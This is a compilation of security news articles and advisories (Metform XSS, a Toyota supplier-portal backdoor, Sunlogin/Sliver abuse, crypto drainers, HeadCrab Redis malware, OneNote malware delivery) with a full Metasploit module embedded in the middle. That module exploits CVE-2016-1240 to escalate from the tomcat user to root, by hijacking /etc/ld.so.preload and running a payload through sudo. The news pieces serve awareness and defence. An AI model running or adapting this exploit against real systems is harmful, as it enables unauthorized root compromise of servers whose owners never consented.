WordPress Metform Elementor Contact Form Builder plugin versions 3.1.2 and below suffer from a persistent cross site scripting vulnerability.

    Affected Plugin: Metform Elementor Contact Form BuilderPlugin Slug: metformAffected Versions: <= 3.1.2CVE ID: CVE-2023-0084CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NResearcher/s: Mohammed El Amin, Chemouri Fully Patched Version: 3.2.0The Metform Elementor Contact Form Builder plugin allows site builders to create highly functional contact forms. Unfortunately, vulnerable versions of the Metform plugin fail to escape submitted form entries when displaying them in the admin panel.This meant that any site visitor could fill out a contact form with malicious JavaScript, and that the script would execute in the browser of any administrator viewing that form entry.While sanitizing input may also have helped, escaping output is much more important for preventing Cross-Site Scripting as bypasses are far less common.The patched version updated the format_form_data function to escape the output form data in order to address this issue.An attacker able to execute JavaScript in the browser of an administrator can use it to take over a website via several methods, including by adding a new malicious administrator or injecting a backdoor into a plugin or theme on the site.Unauthenticated Stored Cross-Site Scripting vulnerabilities are the most dangerous variant of Cross-Site Scripting for WordPress sites as they are much easier for attackers to automatically exploit en masse without needing an existing user account.TimelineJanuary 4, 2023 - Mohammed Chemouri responsibly discloses the vulnerability to the plugin vendor and our Vulnerability Disclosure program.January 8, 2023 - A patched version of the Metform plugin, 3.2.0, is made available.February 3, 2023 - The Wordfence Threat Intelligence team discovers a potential bypass of the existing Cross-Site Scripting rule and releases an additional firewall rule to Wordfence Premium, Care, and Response sites.March 5, 2023 - The firewall rule becomes available to Wordfence free users.ConclusionIn today’s post we detailed an unauthenticated stored Cross-Site Scripting vulnerability in the Metform plugin discovered and responsibly disclosed by independent security researcher Mohammed Chemouri. The Wordfence firewall’s built-in Cross-Site Scripting protection should provide coverage for all Wordfence users including those using Wordfence free.While we did find a potential bypass and deploy an additional rule to coverit, we have not seen this vulnerability exploited at a large scale in the wild, and have not seen any instances of the bypass being exploited. Nonetheless, we strongly recommend updating to the latest version of the Metform Elementor Contact Form Builder plugin, which is 3.2.1 at the time of this writing.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Metform Elementor Contact Form Builder as soon as possible.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.

WordPress Metform Elementor Contact Form Builder 3.1.2 Cross Site Scripting

Hacker praises carmaker’s prompt response to the (mercifully) good-faith pwnage

Adam Bannister 07 February 2023 at 17:34 UTC  
Updated: 07 February 2023 at 17:38 UTC

Hacker praises carmaker’s prompt response to the (mercifully) good-faith pwnage

A security researcher said he hacked into Toyota’s supplier management network and was able to access sensitive data associated with around 3,000 suppliers and 14,000 users worldwide.

Eaton Zveare compromised a web application used by Toyota employees and suppliers to coordinate projects, and containing details about parts, surveys, and purchases. Notable partners and suppliers found on the system included Michelin, Continental, and Stanley Black & Decker.

The researcher ultimately gained access to the Japanese carmaker’s Global Supplier Preparation Information Management System (GSPIMS) as a system administrator via a backdoor in the login mechanism.

RELATED Car companies massively exposed to web vulnerabilities

A malicious breach could have exposed comments made by Toyota employees about suppliers and supplier rankings by risk and other variables, said Zveare.

Zveare described the security hole, which Toyota patched quickly, as “one of the most severe vulnerabilities I have ever found”.

**Return true;**

The path to exploit began by patching the JavaScript code in GSPIMS, an Angular, single-page application created by SHI International Corp on behalf of Toyota.

“Developers control access to Angular routes/pages by implementing CanActivate and CanActivateChild,” said Zveare in a blog post published yesterday (February 6). “Basically, when a user attempts to navigate to a route/page, you would determine if they are allowed to view it, and then return true or false. By patching both to return true, you can usually fully unlock an Angular app.”

He added: “The logout code also needed to be removed to prevent a redirect back to the login page. With those patches applied, the app loads and can be browsed.”

Zveare, who has previously pwned Jacuzzi’s SmartTub app, then leveraged the backdoor via a HTTP request, which surrendered a JSON Web Token with an email, but no password, provided.

The API was used for an ‘Act As’ feature that allowed high privileged users to log in as any global user.

Finding a valid email only required a little Googling of Toyota personnel, since Toyota used a predictable format in North America (firstname.lastname@toyota.com).

**Total, global control**

Initially logged in as a user with a ‘Mgmt – Purchasing’ role, Zveare eventually made it to SysAdmin after finding a rolePrivileges node in the user/details API response, then a findByEmail API endpoint that detailed a user’s managers.

Based on the additional tabs that appeared within the application, it was clear that “with a System Admin JWT, I basically had total, global control over the entire system”, said Zveare.

DON’T MISS Tesla tackles CORS misconfigurations that left internal networks vulnerable

Therefore an attacker could have deleted, modified or leaked data, and abused the data to craft spear phishing campaigns.

Threat actors could have also “added their own user account with an elevated role, to retain access should the issue ever be discovered and fixed”, suggested Zveare.

**Bounty recommendation**

The researcher alerted Toyota to the backdoor on November 3, 2022, and the carmaker responded the same day, before confirming on November 23 that the issue had been fixed.

Toyota and SHI fixed the issue by making the createJWT and endpoints return ‘HTTP status 400 – Bad Request’ in all cases.

“I was glad Toyota recognized the severity of the issue and quickly fixed it,” told The Daily Swig. “Toyota is a huge corporation and it seems like their security team is set up to efficiently address vulnerabilities across all aspects of the company.

“A bounty payment would have been nice, but they did not offer one in this case. I hope they will consider changing this in the future. Recognition is always appreciated, but offering rewards is how you attract top talent and keep exploits off the black market.”

The Daily Swig has invited Toyota to comment – no response yet but we will update the artice if and when they do so.

RECOMMENDED Researcher drops Lexmark RCE zero-day rather than sell vuln ‘for peanuts’

Toyota sealed up a backdoor to its global supplier management network

Threat actors are leveraging known flaws in Sunlogin software to deploy the Sliver command-and-control (C2) framework for carrying out post-exploitation activities.
The findings come from AhnLab Security Emergency response Center (ASEC), which found that security vulnerabilities in Sunlogin, a remote desktop program developed in China, are being abused to deploy a wide range of payloads.
"Not

Threat actors are leveraging known flaws in Sunlogin software to deploy the Sliver command-and-control (C2) framework for carrying out post-exploitation activities.

The findings come from AhnLab Security Emergency response Center (ASEC), which found that security vulnerabilities in Sunlogin, a remote desktop program developed in China, are being abused to deploy a wide range of payloads.

"Not only did threat actors use the Sliver backdoor, but they also used the BYOVD (Bring Your Own Vulnerable Driver) malware to incapacitate security products and install reverse shells," the researchers said.

Attack chains commence with the exploitation of two remote code execution bugs in Sunlogin versions prior to v11.0.0.33 (CNVD-2022-03672 and CNVD-2022-10270), followed by delivering Sliver or other malware such as Gh0st RAT and XMRig crypto coin miner.

In one instance, the threat actor is said to have weaponized the Sunlogin flaws to install a PowerShell script that, in turn, employs the BYOVD technique to incapacitate security software installed in the system and drop a reverse shell using Powercat.

The BYOVD method abuses a legitimate but vulnerable Windows driver, mhyprot2.sys, that's signed with a valid certificate to gain elevated permissions and terminate antivirus processes.

It's worth noting here that the anti-cheat driver for the Genshin Impact video game was previously utilized as a precursor to ransomware deployment, as disclosed by Trend Micro.

"It is unconfirmed whether it was done by the same threat actor, but after a few hours, a log shows that a Sliver backdoor was installed on the same system through a Sunlogin RCE vulnerability exploitation," the researchers said.

The findings come as threat actors are adopting Sliver, a Go-based legitimate penetration testing tool, as an alternative to Cobalt Strike and Metasploit.

"Sliver offers the required step-by-step features like account information theft, internal network movement, and overtaking the internal network of companies, just like Cobalt Strike," the researchers concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit Vulnerabilities in Sunlogin to Deploy Sliver C2 Framework

Cryptocurrency drainers are the latest hot ticket being used in a string of lucrative cyberattacks aimed at virtual currency investors.

There's a trendy new way to con cryptocurrency investors out of the contents of their wallets, no blockchain know-how required.

Threat actors are selling ready-made, spoofed crypto webpages to be served up as phishing lures, loaded with "crypto drainer" scripts that crack wallets and steal the balances in a snap.

In one instance, on a "top-tier Dark Web forum," according to researchers at Recorded Future, cybercrime group iSeeYou was offering a ready-to-use phishing page that when made live, purports to mint nonfungible tokens (NFTs). Instead, it deploys a crypto drainer that empties an unsuspecting victim's connected virtual currency wallet. And adding insult to injury, "once crypto wallets are compromised, no safeguards exist to prevent the theft of crypto assets," the researchers warned.

The gambit is easy to fall for: The phishing lures are certainly convincing, according to the researchers, who added that they convincingly spoof a range of entities, including cryptocurrency exchanges and NFT outlets. The lures often boost their credibility, as was the case in the the iSeeYou campaign, by including access to commonly used third-party services and extensions in the cryptocurrency space, the team said, such as MetaMask. 

"The use of legitimate services on crypto drainer phishing pages may increase the likelihood that the phishing page will pass an otherwise savvy user’s 'scam litmus test,'" according to the report.

The crypto drainer scams were observed in 2022, and Recorded Future raised the alarm in a report this week that they are becoming increasingly popular — so popular, in fact, that Recorded Future recently found 100 phishing pages lurking in the wild, loaded with crypto drainer malware.

"We have observed that Dark Web threat actors are highly interested in this tool," Ilya Volovik, threat intelligence analyst at Recorded Future, tells Dark Reading.

The interest is largely because the scripts are easy to deploy and cheap to acquire (the firm said crypto drainers can cost anywhere from $300 to $500). Sometimes they're even free, as was the case with iSeeYou — but there was a double-crossing catch in that case. 

"Remarkably, the threat actor who posted this crypto drainer phishing template did not charge other threat actors who wished to make use of their tool," Volovik explains. "Unremarkably, this was no act of charity — the crypto drainer was likely designed to defraud other cybercriminals of a portion of their illicit earnings."

In the right social engineering hands, crypto drainers are a potent threat, according to Volovik, who adds that they're helping to usher in a new business model for phishers.

"Designing crypto drainers requires coding skills that phishing specialists may lack," Volovik says. "As a result, many cybercriminals develop crypto drainers to sell or rent out as components in ready-to-go phishing packages; this is likely part of a greater trend toward phishing-as-a-service (PhaaS)." And that, he warns, means that advanced phishing campaigns can scale very quickly.

As cryptocurrency markets mature, it's up to individual services and platforms to keep crypto investors aware of the latest phishing expeditions. 

"Exchange platforms/crypto markets should probably provide education to their users about these crypto drainers and how cybercriminals use them," Volovik adds. "We want to educate the general populace to never send payments to unknown entities (a Nigerian prince or otherwise)."

**Cryptocurrency Cybercrime Is Booming**

Cryptocurrency investors continue to be a prime source of revenue for cybercriminals, with a record-breaking $3.8 billion stolen from crypto businesses in 2022 alone, according to new research from Chainalysis.

During the month of October, the biggest month ever for crypto cyberattacks according to the research firm, there were 32 separate cryptocurrency attacks, with losses totaling $775.7 million.

Much of the crypto cybercrime boom can be attributed to cyberattacks from North Korean state-backed actors, and the targets include crypto wallets, token protocols, decentralized finance (DeFi) protocols, and other centralized cryptocurrency services.

DeFi platforms are the loss leader, the report found, experiencing 82% of cryptocurrency theft for the year. These are platforms that allow cryptocurrency and government-backed fiat currency investors to make trades. Critically, DeFi platforms support a number of different cryptocurrencies like Bitcoin, Ethereum, Solana, and others, and operate outside of a traditional banking structure. Because DeFi platforms are built on the blockchain, an open source protocol, they present a unique opportunity for cybercriminals to get their hands on vast sums of money that would otherwise be protected by those traditional financial institutions.

The now-notorious FTX claimed it was the victim of a cyberattack in November, just hours after filing bankruptcy, which cost the DeFi platform $370 million on top of its already mounting losses. In September, DeFi platform Wintermute lost $160 million to a cyberattack it said was the result of a partner's bad code. And cybercrime group TA4563 was found using an Evilnum backdoor last July that allowed it to drain cryptocurrency out of DeFi platforms automatically.

**Cybersecurity for Cryptocurrency**

Erin Plante, Chainalysis' vice president of investigations, agrees with Volovik that defending cryptocurrency infrastructure, and investors, against cybercrime will require a commitment to user training, but she adds that the DeFi platforms and other crypto services need better in-house cybersecurity too.

"Cryptocurrency services should invest in security measures and training," Plante says. "For example, with North Korean-linked hackers in particular, sophisticated social engineering tactics that take advantage of the trusting and carelessness of human nature to gain access to corporate networks has long been a favored attack vector."

Moving forward, DeFi platforms should model cybersecurity efforts off the traditional finance system, the Chainalysis report advised, adding that robust code auditing practices, simulated attacks, monitoring for suspicious activity, and building in transaction fail-safes to slow down contract execution if suspicious activity is observed.

Crypto Drainers Are Ready to Ransack Investor Wallets

Look for recent trends in attacks, strategies, and vulnerabilities to continue gaining steam throughout 2023.

Global risks from population pressures and climate change to political conflicts and industrial supply chain challenges characterized 2022. Cybercriminals used this turmoil to exploit these trending topics, including significant events, public affairs, social causes, and anywhere else opportunity appeared.

2023 will see a continuation of these challenges, especially as bad actors continue to take advantage of the chaos caused by the expected backlash from Russia due to the Ukraine conflict.

The following cyberthreat predictions are based on key observations made by the Zscaler ThreatLabz research team, made up of more than 125 security experts with decades of experience in tracking threat actors, malware reverse engineering, behavior analytics, and data science.

**CaaS Offerings Continue to Rise**

Crime-as-a-service (CaaS) encompasses the full range of cyber threat service offerings, including ransomware-as-a-service, where developers outsource ransomware to their affiliates who execute the attack and share the profits, and phishing-as-a-service, where cybercriminals can buy grammatically perfect email templates, replicas of popular webpages, and more.

As threat actors seek to increase payouts, they will leverage more service model offerings to increase the effectiveness of their attacks and cut out the development time to quickly scale operations. CaaS also lowers the technical barrier to entry, enabling novice cybercriminals to execute sophisticated threats.

**Supply Chains Bigger Targets Than Ever**

Supply chain attacks occur when adversaries compromise partner and supplier ecosystems to reach their ultimate breach target and goals, such as executing a ransomware attack. Compromising a target's weaker suppliers is more accessible and has led to successful upstream attacks, which is why this tactic will likely increase in the future.

**Dwell Time Decreases**

Dwell time is the period between the initial compromise and the final stage of an attack — for example, the median dwell time for threat actors to deploy ransomware is now just five days, according to Mandiant. For most organizations, this is also the length of time an attack can be detected and stopped by defenders before it causes damage.

**Attackers Rebrand**

Malware families, ransomware gangs, and other cybercriminal associations reorganize themselves frequently.

GandCrab rebranded as REvil, the group responsible for the spotlight attacks on JBS and Kaseya. The old groups typically go dark after an incident, then a new group appears months or years later. Researchers eventually discern that it's basically the old group getting back together, with similar techniques and code styles giving them away.

They may rebrand because of new member affiliations to avoid criminal charges and to ensure they can secure cyber insurance payouts.

**Endpoint Protection Won’t Be Enough**

Threat actors will increase the use of tactics to bypass antivirus and other endpoint security solutions. In addition, their attacks will have an increasing focus on core business service technologies, like VMware ESX, for example.

Last fall, researchers observed attackers using new techniques to install persistent backdoors on ESXi hypervisors, a virtualization software and a primary component in the VMware infrastructure software suites for virtual machines.

Because of this, organizations will have an even greater need for defense-in-depth, rather than relying solely on endpoint security to prevent and detect intrusions.

**Leaked Source Code Leads to Forks**

Forked malware, of course, is just another variant that include updates with more sophisticated techniques. Sometimes the source code for a specific malware is leaked online by a researcher, as in the case of Conti ransomware.

Since Conti ransomware was leaked, for example, parts of the source code have been found in other types of ransomware, borrowed or repurposed by different developers.

Updated and forked versions of malware and other threats make it harder for defenders to detect, because there are so many variants using custom techniques to deploy the same attack. We expect such variants will continue to evolve at different rates.

Read more _Partner Perspectives_ with Zscaler.

Cybercrime Shows No Signs of Slowing Down

This Metasploit module targets a vulnerability in Tomcat versions 6, 7, and 8 on Debian-based distributions where these older versions provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account to escalate their privileges from the tomcat user to root and fully compromise the target system.

    ##### This exploit sample shows how an exploit module could be written to exploit# a bug in a command on a linux computer for priv esc.####class MetasploitModule < Msf::Exploit::Local  Rank = ManualRanking  include Msf::Exploit::Retry  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Post::Linux::Compile  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Tomcat on Ubuntu Log Init Privilege Escalation',        'Description' => %q{          Tomcat (6, 7, 8) packages provided by default repositories on Debian-based          distributions (including Debian, Ubuntu etc.) provide a vulnerable          tomcat init script that allows local attackers who have already gained access          to the tomcat account (for example, by exploiting an RCE vulnerability          in a java web application hosted on Tomcat, uploading a webshell etc.) to          escalate their privileges from tomcat user to root and fully compromise the          target system.          Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Dawid Golunski <dawid@legalhackers.com>' # original PoC, analysis, discovery        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'DefaultOptions' => {          'PrependFork' => true,          'WfsDelay' => 1800 # 30min        },        'References' => [          [ 'EDB', '40450' ],          [ 'URL', 'https://ubuntu.com/security/notices/USN-3081-1'],          [ 'URL', 'http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html'],          [ 'CVE', '2016-1240']        ],        'DisclosureDate' => '2016-09-30',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options [      OptString.new('CATALINA', [ true, 'Location of catalina.out file', '/var/log/tomcat8/catalina.out' ])    ]    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def preload    '/etc/ld.so.preload'  end  def catalina    datastore['CATALINA']  end  def check    package = cmd_exec('dpkg -l tomcat[6-8] | grep \'^i\'')    if package.nil? || package.empty?      return CheckCode::Safe('Unable to execute command to determine installed pacakges')    end    package = package.gsub('\s+', ' ') # replace whitespace with space so we can split easy    package = package.split(' ')    # 0 is ii for installed    # 1 is tomcat# for package name    # 2 is version number    package = Rex::Version.new(package[2])    if (package.to_s.start_with?('8') && package < Rex::Version.new('8.0.32-1ubuntu1.2')) ||       (package.to_s.start_with?('7') && package < Rex::Version.new('7.0.52-1ubuntu0.7')) ||       (package.to_s.start_with?('6') && package < Rex::Version.new('6.0.35-1ubuntu3.8'))      return CheckCode::Appears("Vulnerable app version detected: #{package}")    end    CheckCode::Safe("Unexploitable tomcat packages found: #{package}")  end  def exploit    # Check if we're already root    if is_root? && !datastore['ForceExploit']      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'    end    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    unless file? catalina      fail_with Failure::BadConfig, "#{catalina} not found or still symlinked"    end    if file? preload      fail_with Failure::BadConfig, "#{preload} found, check file as it needs to be removed for exploitation"    end    vprint_status("Creating backup of #{catalina}")    @catalina_content = read_file(catalina)    path = store_loot(      catalina,      'text/plain',      rhost,      @catalina_content,      'catalina.out'    )    print_good("Original #{catalina} backed up to #{path}")    if live_compile?      # upload our privesc stub      so_stub = ".#{rand_text_alphanumeric(5..10)}.so"      so_stub_path = "#{base_dir}/#{so_stub}"      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"      # Upload exploit stub      vprint_status "Compiling exploit stub: #{so_stub_path}"      upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'    else      payload_path = '/tmp/.jMeY5vToQl'      so_stub = '.ny9NyKEPJ.so'      so_stub_path = "/tmp/#{so_stub}"      write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))    end    register_file_for_cleanup(so_stub_path)    # Upload payload executable    vprint_status("Uploading Payload to #{payload_path}")    upload_and_chmodx payload_path, generate_payload_exe    register_file_for_cleanup(payload_path)    # delete the log and symlink ld.so.preload    vprint_status("Deleting #{catalina}")    rm_f(catalina)    vprint_status("Creating symlink from #{preload} to #{catalina}")    cmd_exec("ln -s #{preload} #{catalina}")    register_file_for_cleanup(catalina)    # we now need tomcat to restart    print_good("Waiting #{datastore['WfsDelay']} seconds on tomcat to re-open the logs aka a Tomcat service restart")    succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do      file? preload    end    unless succeeded      print_error("#{preload} not found, exploit aborted")      return    end    register_file_for_cleanup(preload)    # now that we can write to ld.so.preload, use a SUID binary to execute our stub    print_status("injecting #{so_stub_path} into #{preload}")    cmd_exec "echo #{so_stub_path} > #{preload}"    print_status('Escalating payload privileges via SUID binary (sudo)')    cmd_exec 'sudo --help 2>/dev/null >/dev/null'    print_status('Executing payload')    cmd_exec payload_path  end  def cleanup    if @catalina_content.nil?      cmd_exec("touch #{catalina}")    else      write_file(catalina, @catalina_content)    end    super  endend

Apache Tomcat On Ubuntu Log Init Privilege Escalation

Western Digital My Cloud devices before OS5 do not use cryptographically signed Firmware upgrade files.

Some of Western Digital’s MyCloud-based data storage devices. Image: WD.

Countless **Western Digital** customers saw their **MyBook Live** network storage drives remotely wiped in the past month thanks to a bug in a product line the company stopped supporting in 2015, as well as a previously unknown zero-day flaw. But there is a similarly serious zero-day flaw present in a much broader range of newer Western Digital **MyCloud** network storage devices that will remain unfixed for many customers who can’t or won’t upgrade to the latest operating system.

At issue is a remote code execution flaw residing in all Western Digital network attached storage (NAS) devices running **MyCloud** **OS 3**, an operating system the company only recently stopped supporting.

Researchers **Radek Domanski** and **Pedro Ribeiro** originally planned to present their findings at the Pwn2Own hacking competition in Tokyo last year. But just days before the event Western Digital released **MyCloud OS 5**, which eliminated the bug they found. That update effectively nullified their chances at competing in Pwn2Own, which requires exploits to work against the latest firmware or software supported by the targeted device.

Nevertheless, in February 2021, the duo published this detailed YouTube video, which documents how they discovered a chain of weaknesses that allows an attacker to remotely update a vulnerable device’s firmware with a malicious backdoor — using a low-privileged user account that has a blank password.

The researchers said Western Digital never responded to their reports. In a statement provided to KrebsOnSecurity, Western Digital said it received their report after Pwn2Own Tokyo 2020, but that at the time the vulnerability they reported had already been fixed by the release of My Cloud OS 5.

“The communication that came our way confirmed the research team involved planned to release details of the vulnerability and asked us to contact them with any questions,” Western Digital said. “We didn’t have any questions so we didn’t respond. Since then, we have updated our process and respond to every report in order to avoid any miscommunication like this again. We take reports from the security research community very seriously and conduct investigations as soon as we receive them.”

Western Digital ignored questions about whether the flaw found by Domanski and Ribeiro was ever addressed in OS 3. A statement published on its support site March 12, 2021 says the company will no longer provide further security updates to the MyCloud OS 3 firmware.

“We strongly encourage moving to the My Cloud OS5 firmware,” the statement reads. “If your device is not eligible for upgrade to My Cloud OS 5, we recommend that you upgrade to one of our other My Cloud offerings that support My Cloud OS 5. More information can be found here.” A list of MyCloud devices that can support OS 5 is here.

But according to Domanski, OS 5 is a complete rewrite of Western Digital’s core operating system, and as a result some of the more popular features and functionality built into OS3 are missing.

“It broke a lot of functionality,” Domanski said of OS 5. “So some users might not decide to migrate to OS 5.”

In recognition of this, the researchers have developed and released their own patch that fixes the vulnerabilities they found in OS 3 (the patch needs to be reapplied each time the device is rebooted). Western Digital said it is aware of third parties offering security patches for My Cloud OS 3.

“We have not evaluated any such patches and we are unable to provide any support for such patches,” the company stated.

A snippet from the video showing the researchers uploading their malicious firmware via a remote zero-day flaw in MyCloud OS 3.

Domanski said MyCloud users on OS 3 can virtually eliminate the threat from this attack by simply ensuring that the devices are not set up to be reachable remotely over the Internet. MyCloud devices make it super easy for customers to access their data remotely, but doing so also exposes them to attacks like last month’s that led to the mass-wipe of MyBook Live devices.

“Luckily for many users they don’t expose the interface to the Internet,” he said. “But looking at the number of posts on Western Digital’s support page related to OS3, I can assume the userbase is still considerable. It almost feels like Western Digital without any notice jumped to OS5, leaving all the users without support.”

Dan Goodin at _Ars Technica_ has a fascinating deep dive on the other zero-day flaw that led to the mass attack last month on MyBook Live devices that Western Digital stopped supporting in 2015. In response to Goodin’s report, Western Digital acknowledged that the flaw was enabled by a Western Digital developer who removed code that required a valid user password before allowing factory resets to proceed.

Facing a backlash of angry customers, Western Digital also pledged to provide data recovery services to affected customers starting this month. “MyBook Live customers will also be eligible for a trade-in program so they can upgrade to MyCloud devices,” Goodin wrote. “A spokeswoman said the data recovery service will be free of charge.”

If attackers get around to exploiting this OS 3 bug, Western Digital might soon be paying for data recovery services and trade-ins for a whole lot more customers.

CVE-2021-36226: Another 0-Day Looms for Many Western Digital Users

At least 1,200 Redis servers worldwide have been infected with "HeadCrab" cryptominers since 2021.

An unknown threat actor has been quietly mining Monero cryptocurrency on open source Redis servers around the world for years, using a custom-made malware variant that is virtually undetectable by agentless and conventional antivirus tools.

Since September 2021, the threat actor has compromised at least 1,200 Redis servers — that thousands of mostly smaller organizations use as a database or a cache — and taken complete control over them. Researchers from Aqua Nautilus, who spotted the campaign when an attack hit one of its honeypots, are tracking the malware as "HeadCrab."

**Sophisticated, Memory-Resident Malware**

In a blog post this week, the security vendor described HeadCrab as memory-resident malware that presents an ongoing threat to Internet-connected Redis servers. Many of these servers don't have authentication enabled by default because they are meant to run on secure, closed networks.

Aqua's analysis of HeadCrab showed that the malware is designed to take advantage of how Redis works when replicating and synchronizing data stored across multiple nodes within a Redis Cluster. The process involves a command that basically allows administrators to designate a server within a Redis Cluster as a "slave" to another "master" server within the cluster. Slave servers synchronize with the master server and perform a variety of actions, including downloading any modules that might be present on the master server. Redis modules are executable files that administrators can use to enhance the functionality of a Redis server.

Aqua's researchers found HeadCrab exploiting this process to load a cryptocurrency miner on Internet-exposed Redis systems. With the attack on its honeypot, the threat actor, for instance, used the legitimate SLAVEOF Redis command to designate the Aqua honeypot as the slave of an attacker-controlled master Redis server. The master server then initiated a synchronization process in which the threat actor downloaded a malicious Redis module containing the HeadCrab malware.

Asaf Eitani, security researcher at Aqua, says several features of HeadCrab suggest a high degree of sophistication and familiarity with Redis environments.

One big sign of that is the usage of the Redis module framework as a tool to perform malicious actions — in this case, downloading the malware. Also significant is the malware's use of the Redis API to communicate with an attacker-controlled command-and-control server (C2) hosted on what appeared to be a legitimate but compromised server, Eitani says. 

"The malware is specifically built for Redis servers, as it heavily relies on Redis Modules API usage to communicate with its operator," he notes.

HeadCrab implements sophisticated obfuscation features to remain hidden on compromised systems, executes more than 50 actions in a completely fileless fashion, and uses a dynamic loader to execute binaries and evade detection. "The threat actor is also modifying the normal behavior of the Redis service to obscure its presence and to prevent other threat actors from infecting the server by the same misconfiguration he used to gain execution," Eitani notes. "Overall, the malware is very complex and uses multiple methods to achieve an edge on defenders."

The malware is optimized for cryptomining and appears custom-designed for Redis servers. But it has built-in options to do a lot more, Eitani says. As examples, he points to HeadCrab's ability to steal SSH keys to infiltrate other servers and potentially steal data and also its ability to load a fileless kernel module to completely compromise a server's kernel.

Assaf Morag, threat lead analyst at Aqua, says the company has not been able to attribute the attacks to any known threat actor or group of actors. But he suggests that organizations using Redis servers should assume a full breach if they detect HeadCrab on their systems.

"Harden your environments by scanning your Redis configuration files, ensure the server requires authentication and doesn't allow "slaveof" commands if not necessary, and do not expose the server to the Internet if not necessary," Morag advises.

Morag says a Shodan search showed more than 42,000 Redis servers connected to the Internet. Of this, some 20,000 servers allowed some sort of access and can potentially be infected by a brute-force attack or vulnerability exploit, he says.

HeadCrab is the second Redis-targeted malware that Aqua has reported in recent months. In December, the security vendor discovered Redigo, a Redis backdoor written in the Go language. As with HeadCrab, Aqua discovered the malware when threat actors installed on a vulnerable Redis honeypot.

"In recent years, Redis servers have been targeted by attackers, often through misconfiguration and vulnerabilities," according to Aqua's blog post. "As Redis servers have become more popular, the frequency of attacks has increased."

Scores of Redis Servers Infested by Sophisticated Custom-Built Malware

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.
Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Attack Vector / Endpoint Security

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.

Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone.

In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server.

Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK.

"It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote," Proofpoint said.

The infection chains are made possible owing to a OneNote feature that allows for the execution of select file types directly from within the note-taking application in what's a case of a "payload smuggling" attack.

"Most file types that can be processed by MSHTA, WSCRIPT, and CSCRIPT can be executed from within OneNote," TrustedSec researcher Scott Nusbaum said. "These file types include CHM, HTA, JS, WSF, and VBS."

As remedial actions, Finnish cybersecurity firm WithSecure is recommending users block OneNote mail attachments (.one and .onepkg files) and keep close tabs on the operations of the OneNote.exe process.

The shift to OneNote is seen as a response to Microsoft's decision to disallow macros by default in Microsoft Office applications downloaded from the internet last year, prompting threat actors to experiment with uncommon file types such as ISO, VHD, SVG, CHM, RAR, HTML, and LNK.

The aim behind blocking macros is two-fold: To not only reduce the attack surface but also increase the effort required to pull off an attack, even as email continues to be the top delivery vector for malware.

But these are not the only options that have become a popular way to conceal malicious code. Microsoft Excel add-in (XLL) files and Publisher macros have also been put to use as an attack pathway to skirt Microsoft's protections and propagate a remote access trojan called Ekipa RAT and other backdoors.

The abuse of XLL files hasn't gone unnoticed by the Windows maker, which is planning an update to "block XLL add-ins coming from the internet," citing an "increasing number of malware attacks in recent months." The option is expected to be available sometime in March 2023.

When reached for comment, Microsoft told The Hacker News that it had nothing further to share at this time.

"It's clear to see how cybercriminals leverage new attack vectors or less-detected means to compromise user devices," Bitdefender's Adrian Miron said. "These campaigns are likely to proliferate in coming months, with cybercrooks testing out better or improved angles to compromise victims."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

